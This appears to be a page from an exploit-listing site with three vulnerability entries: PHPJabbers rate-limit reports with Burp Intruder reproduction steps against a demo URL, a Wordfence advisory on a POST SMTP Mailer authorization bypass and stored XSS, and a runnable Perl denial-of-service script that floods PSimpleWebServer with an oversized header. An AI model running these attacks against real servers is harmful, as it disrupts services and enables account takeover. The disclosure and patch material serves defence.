Latest exploits :: CodePwn

<pre><code># Exploit Title: PHPJabbers Event Booking Calendar v4.0 - No Rate Limit on Forgot Password # Date: 19/12/2023 # Exploit Author: BugsBD Limited # Discover by: Rahad Chowdhury # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/event-booking-calendar/#sectionDemo # Version: v4.0 # Tested on: Windows 10, Windows 11, Linux # CVE-2023-51294 Descriptions: A serious security vulnerability exists when there is no rate limit implemented on the "Forgot Password" functionality of a system. This oversight enables malicious actors to exploit the system by launching password reset requests in rapid succession, known as "password bombing" or "password reset bombing." Without rate limiting, attackers can flood the system with a large number of password reset attempts, potentially causing service disruptions, overwhelming email servers, and facilitating unauthorized access to user accounts. Implementing proper rate limiting mechanisms is crucial to mitigate the risk of such attacks and enhance the overall security posture of the system. Steps to Reproduce: 1. Visit this URL https://demo.phpjabbers.com/1700468974_388/index.php?controller=pjBase&action=pjActionForgot 2. Now use the account mail that is already registered on this website. 3. Capture request data using burp suite and send it to Intruder Tab 4. Configure Intruder and Start Attack 5. Check your email. ## Reproduce: [href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51294) # Exploit Title: PHPJabbers Event Booking Calendar v4.0 Missing Rate Limiting # Date: 19/12/2023 # Exploit Author: BugsBD Limited # Discover by: Rahad Chowdhury # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/event-booking-calendar/#sectionDemo # Version: v4.0 # Tested on: Windows 10, Windows 11, Linux # CVE-2023-51293 Descriptions: PHPJabbers Event Booking Calendar v4.0 is vulnerable to Rate limiting. Rate limiting is implemented in web applications and APIs to prevent abuse, such as brute-force attacks or excessive requests that could lead to resource exhaustion. When a rate limit is bypassed or not properly enforced, it opens the door for attackers to carry out malicious activities more quickly than intended, potentially leading to unauthorized access, data breaches, or service disruption. Steps to Reproduce: 1. Login to your dashboard. 2. Goto System Options Menu then open the Email Settings section. 3. Now use any email and name in the Email address and Name field. 4. Check your email. ## Reproduce: [href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51293) </code></pre>

<pre><code>Vulnerability Summary from Wordfence Intelligence Description: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress <= 2.8.7 – Authorization Bypass via type connect-app API Affected Plugin: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress Plugin Slug: post-smtp Affected Versions: <= 2.8.7 CVE ID: CVE-2023-6875 CVSS Score: 9.8 (Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Researcher/s: Ulyses Saicha Fully Patched Version: 2.8.8 Bounty Awarded: $4,125.00 The "POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress" plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover. Description: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress <= 2.8.7 – Unauthenticated Stored Cross-Site Scripting via device Affected Plugin: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress Plugin Slug: post-smtp Affected Versions: <= 2.8.7 CVE ID: CVE-2023-7027 CVSS Score: 7.2 (High) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N Researcher/s: Sean Murphy Fully Patched Version: 2.8.8 Bounty Awarded: $825.00 The "POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘device’ header in all versions up to, and including, 2.8.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Technical Analysis #1: Authorization Bypass via type connect-app API The POST SMTP Mailer plugin helps configure an SMTP mailer in WordPress, replacing the default PHP mail function to improve email delivery. In addition, a mobile application can be connected to the plugin using a generated auth key. Examining the code reveals that the plugin uses the connect_app() function in the Post_SMTP_Mobile_Rest_API class to save the mobile application connection settings. [View this code snippet on the blog] Knowledge of a randomly generated authentication nonce is required in order to set the value of the FCM token. However, the plugin deletes the auth token in all cases. This means that after sending the request, the auth nonce is always empty. This made it possible for the attacker to set the FCM token in the next request, providing a zero value for the auth key which would successfully validate as true. With the connected application, it is possible to access and view all emails, including password reset emails. This can be used for complete site compromise by an attacker triggering a password reset for a site’s administrator user, and then obtaining the password reset email through the log data. Once an attacker has access to this key, they can reset the password for that user and log in to the account. Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modifying posts and pages which can be leveraged to redirect site users to other malicious sites. Technical Analysis #2: Unauthenticated Stored Cross-Site Scripting via device In the same connect_app() function of the plugin, the mobile application connection settings include the device value. Examining the code reveals that a sanitization function is missing at the device value input in the connect_app() function, and escaping is also missing at the output in the section() function. [View this code snippet on the blog] This makes it possible for unauthenticated attackers to inject arbitrary web scripts, which will execute whenever an administrator opens the mobile application settings page. As with all Cross-Site Scripting vulnerabilities, this can be leveraged by an attacker to achieve remote code execution. Wordfence Firewall The following graphic illustrates how the Wordfence firewall prevents an attacker from successfully exploiting the authorization bypass vulnerability. post-smtp-mailer-authorization-bypass-howto-wordfence-firewall Disclosure Timeline December 8, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion for a separate vulnerability in the plugin. December 14, 2023 – We receive the submission of the Authorization Bypass vulnerability in POST SMTP Mailer via the Wordfence Bug Bounty Program. December 15, 2023 – We validate the report and confirm the proof-of-concept exploit. December 15, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix. December 19, 2023 – We receive the submission of the Stored Cross-Site Scripting vulnerability in POST SMTP Mailer via the Wordfence Bug Bounty Program. December 20, 2023 – We validate the report and confirm the proof-of-concept exploit. We send over the full disclosure details for the unauthenticated XSS. January 1, 2024 – The fully patched version, 2.8.8, is released. January 3, 2024 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. February 2, 2024 – Wordfence Free users receive the same protection. Conclusion In this blog post, we detailed an Authorization Bypass and a Stored Cross-Site Scripting vulnerabilities within the POST SMTP Mailer plugin affecting versions 2.8.7 and earlier. The Authorization Bypass vulnerability allows unauthenticated threat actors to reset the API key used to authenticate to the mailer and view logs, including password reset emails, resulting in a full site compromise. The Stored Cross-Site Scripting vulnerability allows unauthenticated threat actors to inject malicious web scripts into pages. The vulnerabilities have been fully addressed in version 2.8.8 of the plugin. We encourage WordPress users to verify that their sites are updated to the latest patched version of POST SMTP Mailer. Wordfence users running Wordfence Premium , Wordfence Care , and Wordfence Response have been protected against these vulnerabilities as of January 3, 2024. Users still using the free version of Wordfence will receive the same protection on February 2, 2024. If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk. </code></pre>

<pre><code>#!/usr/bin/perl use IO::Socket::INET; # Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 11 january 2024 # Vendor Homepage: http://www.pmx.it/ # Download to demo: https://drive.google.com/file/d/1tAK7dKl3yBPQSeo5Tid4p2FETyh8Zjvs/view?usp=sharing # Notification vendor: No reported # Tested Version: PSimpleWebServer 2.2-rc2 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=YFfBuWnHeQY #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server did not properly handle request with large amounts of data to web server. #The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "\t ==> Connecting to webserver... \n\n"; sleep(1); our $exploit = "\x41"x2014; $exploit = "x\41"x2104; if ($socket = IO::Socket::INET->new (PeerAddr => $ip, PeerPort => $port, Proto => "TCP")) { $header = "GET / HTTP/1.1\r\n". "Host: ".$ip." \r\n". "Connection:".$exploit."\r\n"; print $socket $header."\r\n"; sleep(1); close($socket); } else { print "[-] Connection to $ip failed!\n"; exit; } print "\t ==> Done! Exploited!"; sub intro { print q { ,,__ .. .. / o._) /--'/--\ \-'|| / \_/ / | .'\ \__\ __.'.' )\ | )\ | // \\ // \\ ||_ \\|_ \\_ '--' '--'' '--' [+] SimpleWebServer 2.2-rc2 - Denial of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: fernando.mengalli@gmail.com } } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print "\n\tUsage: $0 <ip> <port> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated </code></pre>